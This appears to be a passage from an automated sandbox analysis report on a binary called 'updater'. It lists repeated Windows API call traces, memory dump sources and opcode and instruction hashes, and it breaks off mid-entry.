                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 575e1820f91d7ae1f3817e17c6ba43d49a41ddeabd72f195f9c068e1af536cca
                                    • Instruction ID: c9dafa8635122af7c59c1748a89c195343bd86eec59964dce4edf71344d24fd5
                                    • Opcode Fuzzy Hash: 575e1820f91d7ae1f3817e17c6ba43d49a41ddeabd72f195f9c068e1af536cca
                                    • Instruction Fuzzy Hash: DFD0C9B5284308BBF6105A849C06FBAB7ACE708B42F008000BB48890D4C6B068108761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,014253BF,?,?,00000008,?,?,0142EF09,00000000), ref: 014255F1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionRaise
                                    • String ID:
                                    • API String ID: 3997070919-0
                                    • Opcode ID: 6d1d1cc3ee2c05cee4a70bacd6f07d9c50201ab5985d884dd6ac674f60c52460
                                    • Instruction ID: e7d7ceadd8a3d86f47b5c31bba684a7b90784432a901df84832af1f2dff5d40d
                                    • Opcode Fuzzy Hash: 6d1d1cc3ee2c05cee4a70bacd6f07d9c50201ab5985d884dd6ac674f60c52460
                                    • Instruction Fuzzy Hash: 07B16B312106149FE725CF2CC486BA57BA1FF05364F658659E999CF3B1C335E992CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0140E68E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-0
                                    • Opcode ID: 5299fa070e08f56cc98779263e20dbb773ef581a2d7ad851aa70d74b981f0804
                                    • Instruction ID: 7efe032a4f500a1f7e5200efd2c1017f76c1ae3a0a2fc75808100aa8aaf66e62
                                    • Opcode Fuzzy Hash: 5299fa070e08f56cc98779263e20dbb773ef581a2d7ad851aa70d74b981f0804
                                    • Instruction Fuzzy Hash: E3516DB2A013058BEB26CF5AD485BAABBF1FB48310F14886BD911E73A5E374D950CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                      • Part of subcall function 0142049B: _free.LIBCMT ref: 014204FD
                                      • Part of subcall function 0142049B: _free.LIBCMT ref: 01420533
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0142AFEC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free$InfoLocale
                                    • String ID:
                                    • API String ID: 2003897158-0
                                    • Opcode ID: 3fcb805c424cf86e9ff0d6ce56d4e7690471ce71c1ef45f51fd033d4368812c9
                                    • Instruction ID: 1687908085d65623568663c46180e5a651694d14da1480487852d14665de163b
                                    • Opcode Fuzzy Hash: 3fcb805c424cf86e9ff0d6ce56d4e7690471ce71c1ef45f51fd033d4368812c9
                                    • Instruction Fuzzy Hash: C121F5B2501216ABEB299E29CC41E7B77A8EF15310F50407FEE11D72A1EB78D9808B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    • EnumSystemLocalesW.KERNEL32(0142AD45,00000001,00000000,?,-00000050,?,0142B373,00000000,?,?,?,00000055,?), ref: 0142AC91
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem
                                    • String ID:
                                    • API String ID: 2417226690-0
                                    • Opcode ID: 55a37d881c93232ff38f50282b61f649cd026340b222089e0bc0f1b9ef3e5352
                                    • Instruction ID: 5fb7e0883195fa6bae59217b4c3ea8d9a39c44165fd70b3a7559b1e5b6ebda79
                                    • Opcode Fuzzy Hash: 55a37d881c93232ff38f50282b61f649cd026340b222089e0bc0f1b9ef3e5352
                                    • Instruction Fuzzy Hash: D211C63A2047155FDB189F3A889157AB792FB80359B64442EE98747B50D7716982C740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0142AF61,00000000,00000000,?), ref: 0142B1F0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale
                                    • String ID:
                                    • API String ID: 3736152602-0
                                    • Opcode ID: 1295fb00ebd2540c08fb9ce0c2e6eb6cad5056734e6c832ed8daab306f57767e
                                    • Instruction ID: a276b8521faacef8ee0c7b622449b3eed39b2736a2a8b3e4ab085a98c8fef69e
                                    • Opcode Fuzzy Hash: 1295fb00ebd2540c08fb9ce0c2e6eb6cad5056734e6c832ed8daab306f57767e
                                    • Instruction Fuzzy Hash: 2FF0FE365102226BDB245B259C0DABF7B54DB41254F54082ADD01E3650DE70FE81C6A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                      • Part of subcall function 0142049B: _free.LIBCMT ref: 014204FD
                                      • Part of subcall function 0142049B: _free.LIBCMT ref: 01420533
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0142AFEC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free$InfoLocale
                                    • String ID:
                                    • API String ID: 2003897158-0
                                    • Opcode ID: 57fe068c7f6379cfa379b2c42e7885ae24001a64009d0b39491a31ee3f5534a6
                                    • Instruction ID: 5a540a3846a3366c2ddcd650f6bc3f83e7d1331f3af865f9f1bc4ac0367626d2
                                    • Opcode Fuzzy Hash: 57fe068c7f6379cfa379b2c42e7885ae24001a64009d0b39491a31ee3f5534a6
                                    • Instruction Fuzzy Hash: 8CF0287260021AABDB28EF35DC41EFA33E8DB54310F40417FFA02E7290DA78AD428790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    • EnumSystemLocalesW.KERNEL32(0142AF98,00000001,00000000,?,-00000050,?,0142B337,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0142AD04
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem
                                    • String ID:
                                    • API String ID: 2417226690-0
                                    • Opcode ID: 224413b97b9bc5a2280df0870938d1c077a024178e6176cf483b231b155ca438
                                    • Instruction ID: 677eb5a2cd01d7faeeb843d8e2aa0dbf7121e152a4bac6615539f392e0354714
                                    • Opcode Fuzzy Hash: 224413b97b9bc5a2280df0870938d1c077a024178e6176cf483b231b155ca438
                                    • Instruction Fuzzy Hash: 74F04C762003151FDB149F3AD884A7A7B91EF80318B65442EFD0287AA0C6715882C750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0141703F: EnterCriticalSection.KERNEL32(?,?,01427562,?,014503C8,0000000C), ref: 0141704E
                                    • EnumSystemLocalesW.KERNEL32(0141F7E2,00000001,014501A0,0000000C,0141FC0D,00000000), ref: 0141F827
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 20f62ac8142c7acd39087cec30c719708e30597b6393aeda4971e35b4d9d2842
                                    • Instruction ID: c190e09d80608df99ad9b5ce37fbc2679cc16ad2e24991ee4840a26395e9137c
                                    • Opcode Fuzzy Hash: 20f62ac8142c7acd39087cec30c719708e30597b6393aeda4971e35b4d9d2842
                                    • Instruction Fuzzy Hash: 68F08772A40200DFDB10EF99E841B887BF0EB14721F20442FE810EB2A1CBB5A8448B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
                                      • Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E
                                    • EnumSystemLocalesW.KERNEL32(0142AB2D,00000001,00000000,?,?,0142B395,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0142AC0B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem
                                    • String ID:
                                    • API String ID: 2417226690-0
                                    • Opcode ID: f9e38161343b95a62d4723bc3dc4ae0206998fb0854258a3e49b9840d6571519
                                    • Instruction ID: f8d37d34994238df103a8a19f2db5d8cafceee08eef964bcee655d8cf0d1cea0
                                    • Opcode Fuzzy Hash: f9e38161343b95a62d4723bc3dc4ae0206998fb0854258a3e49b9840d6571519
                                    • Instruction Fuzzy Hash: 9DF05C3630021557CB149F3AD844666BF95EFC1610F56405EFF068B660C6319483C750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetVersionExA.KERNEL32(?), ref: 013D2F80
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Version
                                    • String ID:
                                    • API String ID: 1889659487-0
                                    • Opcode ID: 68dcc2e5919f9db94df7bdec11aac1e9b1139a1e89e50fd9cff21cd1f3e720a7
                                    • Instruction ID: 9f9331c33b3505af435a56ffafa85c0a1061142ab92a65a0c3f331e0ea2cf353
                                    • Opcode Fuzzy Hash: 68dcc2e5919f9db94df7bdec11aac1e9b1139a1e89e50fd9cff21cd1f3e720a7
                                    • Instruction Fuzzy Hash: 27E086B95053144FEF389B34A605B1E77F8A704608F4004ACC50BD2192E734D589CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0
                                    • API String ID: 0-4108050209
                                    • Opcode ID: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
                                    • Instruction ID: 393166c91e755091f5e73b8cc084ee38fb18a6642b820cd7ae0406e9b552b737
                                    • Opcode Fuzzy Hash: 212d41e811b1552a254e54863f90ba3ab3870877e4b696d0ac94e4a8afe8f32b
                                    • Instruction Fuzzy Hash: 1151CB7225464956EB388A7D84947FFAF9BAB52380F0C001FD683DB3BDC73199468349
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • GetProcessHeap.KERNEL32(?,00000000,013CDD2B,80070216,?,?,?,?,00000000,?,?,?,013B4770,?,00000003,00000000), ref: 013B4481
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                    • String ID:
                                    • API String ID: 325507722-0
                                    • Opcode ID: 50f1514885ffbff1948c42be6d2ee7d90f03d179156e9ff5985ebb6e63912da3
                                    • Instruction ID: a15ddb68f18528f991e3b545c894cb6f3eb886b6d52b4cf2ffc1f3fa9029374d
                                    • Opcode Fuzzy Hash: 50f1514885ffbff1948c42be6d2ee7d90f03d179156e9ff5985ebb6e63912da3
                                    • Instruction Fuzzy Hash: F911BF31508741CBC722ABAAF48476937B1E7A0336F14011FE111DF1FAEB74A485EB14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
                                    • Instruction ID: 21a40d16f2c4d035e6a95c7dc936a62172911ce773fccc53736fcb1e47b48c26
                                    • Opcode Fuzzy Hash: c4a3741b0f9a16d048f5068559cef03b2e543d41a1bca58f1c10afaa1f1075f7
                                    • Instruction Fuzzy Hash: 612282B7F515144BDB0CCA5DCCA23ECB2E3AFD4218B0E813DA90AE3745EA7DD9158684
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
                                    • Instruction ID: ee636f2dd882e72e64df85534f63ac7f5b9db4f39c1d4def27f92760e39da3b7
                                    • Opcode Fuzzy Hash: 280ef415a64cce27c24b2fe8d290cf29b277306fbeba8217d51b082f2eb57832
                                    • Instruction Fuzzy Hash: 04329D74A4020ACFCB19CFACCDD5ABEBBB5EF44304F15416AD845A7369D631AA06CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 52f192a7fe9303fc6ffdcde38b42a7a93f7ce0fc63f8907f37a526e49bc25277
                                    • Instruction ID: eb7cf8fe880d6e4f29dabdedab8cc3435c72e4c73101c7c3132b75db793caebc
                                    • Opcode Fuzzy Hash: 52f192a7fe9303fc6ffdcde38b42a7a93f7ce0fc63f8907f37a526e49bc25277
                                    • Instruction Fuzzy Hash: D8320372D2AF514DD7239538D8223366649AFA72C4F56D737FC19B5AAAEB38C4C34200
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
                                    • Instruction ID: 15d49bb9b8c6399156f47937971d817de0f70208272a91f8da4d2374a3bceeff
                                    • Opcode Fuzzy Hash: 583262a0133c3858a8c32bee194a6fd0b161d2739f929eed09effdd476ca36dd
                                    • Instruction Fuzzy Hash: DC026072E0420A9FDB15DF6DE490AADBBF2EF8821CF144069D945AB351EB31ED41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a69c7eb3893c19ee6bea2b25a671256e7d27ce8eae43ca5379412f86c5d99afc
                                    • Instruction ID: aec6ad690fcd0480027c6d61e92e77537a9b760c1421a7baf898c65fce83eee6
                                    • Opcode Fuzzy Hash: a69c7eb3893c19ee6bea2b25a671256e7d27ce8eae43ca5379412f86c5d99afc
                                    • Instruction Fuzzy Hash: 8B02B075E00A49DFDB16CFB8D890AAEB7B5FF49384F00832AEA157B251D7309842CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalCurrentEnterSectionThread
                                    • String ID:
                                    • API String ID: 3488303727-0
                                    • Opcode ID: ca2b5203e5d241f50ba683346635383b8247aa23798b2bf0ece1920547a6daab
                                    • Instruction ID: b922cc39d5f6e4d961f63f40a0b6f40fbba1f4e9092bcefcba69a9f40fb7f645
                                    • Opcode Fuzzy Hash: ca2b5203e5d241f50ba683346635383b8247aa23798b2bf0ece1920547a6daab
                                    • Instruction Fuzzy Hash: CDD15772A043529FDB25DF38D8856AABBF1FF91324F14456EE8C58B281D734D846CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
